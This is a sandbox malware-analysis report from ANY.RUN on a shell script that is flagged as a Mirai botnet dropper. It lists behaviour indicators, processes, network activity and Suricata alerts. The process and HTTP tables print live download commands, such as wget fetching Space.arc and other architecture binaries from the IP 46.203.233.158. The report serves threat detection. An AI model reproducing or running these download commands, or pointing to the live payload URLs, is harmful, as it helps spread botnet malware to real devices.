Malware analysis 1.sh Malicious activity | ANY.RUN

Add for printing

File name:	1.sh
Full analysis:	https://app.any.run/tasks/143d1aac-dee9-45cc-aea6-e8abe66de520
Verdict:	Malicious activity
Threats:	Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	May 15, 2025, 10:42:49
OS:	Ubuntu 22.04.2
Tags:	mirai botnet adware
Indicators:
MIME:	text/x-shellscript
File info:	Bourne-Again shell script, ASCII text executable
MD5:	6DC896D731B318676A07E21CA6F31C93
SHA1:	C69B8769743CAD8878073EBE3232560472CB073E
SHA256:	953C5B30B0667E603EAC5A60E09C3788CDF3CA49AD340B11AA398CE21CA6B182
SSDEEP:	48:iivervehmlivetvenEliveaveCXlive2veePliveapveazvZlivea/veaFvjliv0:iiv8vgmlivmvuElivzvpXlivLvBPliv+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been detected (SURICATA)
  - Space (PID: 39616)
  - Space (PID: 39572)
  - Space (PID: 39585)
  - Space (PID: 39618)
  - Space (PID: 39651)
  - wget (PID: 39654)
  - Space (PID: 39684)
  - Space (PID: 39653)
  - Space (PID: 39718)
  - Space (PID: 39686)
  - Space (PID: 39752)
  - Space (PID: 39720)
  - Space (PID: 39754)
  - Space (PID: 39786)
  - Space (PID: 39788)
  - Space (PID: 39820)
  - Space (PID: 39890)
  - Space (PID: 39856)
  - Space (PID: 39926)
  - Space (PID: 39959)
  - Space (PID: 39928)
  - Space (PID: 39995)
  - Space (PID: 39997)
  - Space (PID: 40032)
  - Space (PID: 40030)
SUSPICIOUS
- Executes commands using command-line interpreter
  - sudo (PID: 39493)
- Modifies file or directory owner
  - sudo (PID: 39490)
- Reads passwd file
  - curl (PID: 39542)
  - dumpe2fs (PID: 39531)
  - dumpe2fs (PID: 39523)
  - curl (PID: 39587)
  - curl (PID: 39620)
  - curl (PID: 39655)
  - curl (PID: 39688)
  - curl (PID: 39499)
  - curl (PID: 39722)
  - curl (PID: 39756)
  - curl (PID: 39790)
  - curl (PID: 39824)
  - curl (PID: 39858)
  - curl (PID: 39894)
  - curl (PID: 39963)
  - curl (PID: 39999)
  - curl (PID: 39930)
- Check the Environment Variables Related to System Identification (os-release)
  - curl (PID: 39499)
  - curl (PID: 39587)
  - curl (PID: 39620)
  - curl (PID: 39655)
  - curl (PID: 39688)
  - curl (PID: 39542)
  - curl (PID: 39722)
  - curl (PID: 39756)
  - curl (PID: 39790)
  - curl (PID: 39824)
  - curl (PID: 39858)
  - curl (PID: 39894)
  - curl (PID: 39930)
  - curl (PID: 39963)
  - curl (PID: 39999)
- Potential Corporate Privacy Violation
  - wget (PID: 39498)
  - curl (PID: 39499)
  - curl (PID: 39542)
  - wget (PID: 39541)
  - wget (PID: 39586)
  - wget (PID: 39619)
  - curl (PID: 39655)
  - wget (PID: 39654)
  - wget (PID: 39721)
  - curl (PID: 39722)
  - wget (PID: 39755)
  - curl (PID: 39756)
  - wget (PID: 39789)
  - curl (PID: 39790)
  - wget (PID: 39823)
  - curl (PID: 39824)
  - wget (PID: 39857)
  - curl (PID: 39858)
  - wget (PID: 39893)
  - curl (PID: 39894)
  - curl (PID: 39963)
  - wget (PID: 39962)
  - wget (PID: 39998)
- Connects to unusual port
  - Space (PID: 39572)
  - Space (PID: 39616)
  - Space (PID: 39585)
  - Space (PID: 39618)
  - Space (PID: 39651)
  - Space (PID: 39684)
  - Space (PID: 39653)
  - Space (PID: 39718)
  - Space (PID: 39686)
  - Space (PID: 39720)
  - Space (PID: 39752)
  - Space (PID: 39754)
  - Space (PID: 39786)
  - Space (PID: 39820)
  - Space (PID: 39822)
  - Space (PID: 39788)
  - Space (PID: 39854)
  - Space (PID: 39890)
  - Space (PID: 39856)
  - Space (PID: 39926)
  - Space (PID: 39959)
  - Space (PID: 39928)
  - Space (PID: 39961)
  - Space (PID: 39995)
  - Space (PID: 40032)
  - Space (PID: 40030)
  - Space (PID: 39997)
- Reads /proc/mounts (likely used to find writable filesystems)
  - curl (PID: 39542)
  - curl (PID: 39587)
  - curl (PID: 39620)
  - curl (PID: 39655)
  - curl (PID: 39688)
  - curl (PID: 39722)
  - curl (PID: 39756)
  - curl (PID: 39790)
  - curl (PID: 39824)
  - curl (PID: 39858)
  - curl (PID: 39894)
  - curl (PID: 39930)
  - curl (PID: 39963)
  - curl (PID: 39999)
- Contacting a server suspected of hosting an CnC
  - Space (PID: 39572)
  - Space (PID: 39616)
  - Space (PID: 39585)
  - Space (PID: 39618)
  - Space (PID: 39651)
  - Space (PID: 39684)
  - Space (PID: 39653)
  - Space (PID: 39686)
  - Space (PID: 39718)
  - Space (PID: 39752)
  - Space (PID: 39720)
  - Space (PID: 39786)
  - Space (PID: 39754)
  - Space (PID: 39788)
  - Space (PID: 39820)
  - Space (PID: 39890)
  - Space (PID: 39856)
  - Space (PID: 39926)
  - Space (PID: 39959)
  - Space (PID: 39928)
  - Space (PID: 39995)
  - Space (PID: 40032)
  - Space (PID: 40030)
  - Space (PID: 39997)
- Connects to the server without a host name
  - curl (PID: 39587)
  - wget (PID: 39586)
  - wget (PID: 39619)
  - curl (PID: 39620)
  - curl (PID: 39655)
  - wget (PID: 39654)
  - curl (PID: 39688)
  - wget (PID: 39687)
  - curl (PID: 39722)
  - wget (PID: 39721)
  - wget (PID: 39755)
  - curl (PID: 39756)
  - wget (PID: 39789)
  - wget (PID: 39823)
  - curl (PID: 39824)
  - curl (PID: 39790)
  - wget (PID: 39857)
  - curl (PID: 39858)
  - wget (PID: 39893)
  - curl (PID: 39894)
  - wget (PID: 39929)
  - curl (PID: 39930)
  - curl (PID: 39963)
  - curl (PID: 39999)
  - wget (PID: 39962)
  - wget (PID: 39998)
- Uses wget to download content
  - bash (PID: 39495)
- Access to an unwanted program domain was detected
  - Space (PID: 40037)
INFO
- Creates file in the temporary folder
  - wget (PID: 39498)
  - cp (PID: 39497)
  - curl (PID: 39499)
  - cat (PID: 39567)
  - curl (PID: 39542)
  - curl (PID: 39587)
  - bash (PID: 39611)
  - wget (PID: 39586)
  - wget (PID: 39619)
  - curl (PID: 39620)
  - bash (PID: 39646)
  - wget (PID: 39654)
  - curl (PID: 39655)
  - bash (PID: 39679)
  - cat (PID: 39537)
  - wget (PID: 39541)
  - curl (PID: 39688)
  - bash (PID: 39713)
  - wget (PID: 39721)
  - bash (PID: 39747)
  - curl (PID: 39722)
  - wget (PID: 39755)
  - curl (PID: 39756)
  - bash (PID: 39781)
  - wget (PID: 39789)
  - curl (PID: 39790)
  - bash (PID: 39815)
  - wget (PID: 39823)
  - curl (PID: 39824)
  - bash (PID: 39849)
  - curl (PID: 39858)
  - bash (PID: 39885)
  - wget (PID: 39857)
  - wget (PID: 39893)
  - curl (PID: 39894)
  - bash (PID: 39921)
  - wget (PID: 39962)
  - curl (PID: 39963)
  - bash (PID: 39990)
  - curl (PID: 39930)
  - bash (PID: 39954)
  - wget (PID: 39998)
  - curl (PID: 39999)
  - bash (PID: 40025)
- Checks timezone
  - wget (PID: 39498)
  - dumpe2fs (PID: 39523)
  - dumpe2fs (PID: 39531)
  - wget (PID: 39586)
  - wget (PID: 39619)
  - wget (PID: 39654)
  - wget (PID: 39687)
  - wget (PID: 39721)
  - wget (PID: 39541)
  - wget (PID: 39755)
  - wget (PID: 39789)
  - wget (PID: 39823)
  - wget (PID: 39893)
  - wget (PID: 39857)
  - wget (PID: 39929)
  - wget (PID: 39962)
  - wget (PID: 39998)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.sh	\|	Linux/UNIX shell script (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

475

Monitored processes

255

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
39489	/bin/sh -c "sudo chown user /tmp/1\.sh && chmod +x /tmp/1\.sh && DISPLAY=:0 sudo -iu user /tmp/1\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
39490	sudo chown user /tmp/1.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39491	chown user /tmp/1.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
39492	chmod +x /tmp/1.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39493	sudo -iu user /tmp/1.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39494	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
39495	/bin/bash /tmp/1.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
39496	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
39497	cp /bin/busybox /tmp/	/usr/bin/cp	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
39498	wget http://46.203.233.158/hiddenbin/Space.arc	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
39497	cp	/tmp/busybox		binary
		MD5:—	SHA256:—
39498	wget	/tmp/Space.arc		binary
		MD5:—	SHA256:—
39537	cat	/tmp/Space		binary
		MD5:—	SHA256:—
39541	wget	/tmp/Space.x86		binary
		MD5:—	SHA256:—
39567	cat	/tmp/Space		binary
		MD5:—	SHA256:—
39586	wget	/tmp/Space.x86_64		binary
		MD5:—	SHA256:—
39619	wget	/tmp/Space.i686		o
		MD5:—	SHA256:—
39654	wget	/tmp/Space.mips		binary
		MD5:—	SHA256:—
39721	wget	/tmp/Space.mpsl		binary
		MD5:—	SHA256:—
39755	wget	/tmp/Space.arm		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

326

TCP/UDP connections

1 907

DNS requests

Threats

13 178

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.96:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
39499	curl	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.arc	unknown	—	—	unknown
39498	wget	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.arc	unknown	—	—	unknown
39541	wget	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.x86	unknown	—	—	unknown
39586	wget	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.x86_64	unknown	—	—	unknown
39542	curl	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.x86	unknown	—	—	unknown
39619	wget	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.i686	unknown	—	—	unknown
39620	curl	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.i686	unknown	—	—	unknown
39587	curl	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.x86_64	unknown	—	—	unknown
39654	wget	GET	200	46.203.233.158:80	http://46.203.233.158/hiddenbin/Space.mips	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.18:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	185.125.190.96:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	212.102.56.179:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
—	—	195.181.175.40:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
39498	wget	46.203.233.158:80	—	PJSC Ukrtelecom	UA	unknown
39499	curl	46.203.233.158:80	—	PJSC Ukrtelecom	UA	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2620:2d:4000:1::97 2620:2d:4002:1::198 2620:2d:4000:1::23 2001:67c:1562::23 2620:2d:4000:1::98 2620:2d:4000:1::2b 2001:67c:1562::24 2620:2d:4000:1::2a 2620:2d:4000:1::22 2620:2d:4002:1::196 2620:2d:4000:1::96 185.125.190.96 185.125.190.48 185.125.190.17 91.189.91.49 185.125.190.18 91.189.91.48 185.125.190.49 185.125.190.97 91.189.91.96 185.125.190.98 91.189.91.98	whitelisted
odrs.gnome.org	212.102.56.179 195.181.175.40 207.211.211.26 37.19.194.80 169.150.255.183 169.150.255.180 195.181.170.18 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::107 2a02:6ea0:c700::101 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::11	whitelisted
google.com	172.217.16.142 2a00:1450:4001:808::200e	whitelisted
api.snapcraft.io	185.125.188.59 185.125.188.58 185.125.188.54 185.125.188.57 2620:2d:4000:1010::2e6 2620:2d:4000:1010::117 2620:2d:4000:1010::42 2620:2d:4000:1010::344	whitelisted
13.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
39498	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arc File
39498	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39499	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39542	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39499	curl	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arc File
39542	curl	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .x86
39542	curl	Potentially Bad Traffic	ET INFO x86 File Download Request from IP Address
39499	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39542	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39541	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

1.sh

6DC896D731B318676A07E21CA6F31C93

C69B8769743CAD8878073EBE3232560472CB073E

953C5B30B0667E603EAC5A60E09C3788CDF3CA49AD340B11AA398CE21CA6B182

48:iivervehmlivetvenEliveaveCXlive2veePliveapveazvZlivea/veaFvjliv0:iiv8vgmlivmvuElivzvpXlivLvBPliv+

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Executes commands using command-line interpreter

Modifies file or directory owner

Reads passwd file

Check the Environment Variables Related to System Identification (os-release)

Potential Corporate Privacy Violation

Connects to unusual port

Reads /proc/mounts (likely used to find writable filesystems)

Contacting a server suspected of hosting an CnC

Connects to the server without a host name

Uses wget to download content

Access to an unwanted program domain was detected

INFO

Creates file in the temporary folder

Checks timezone

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings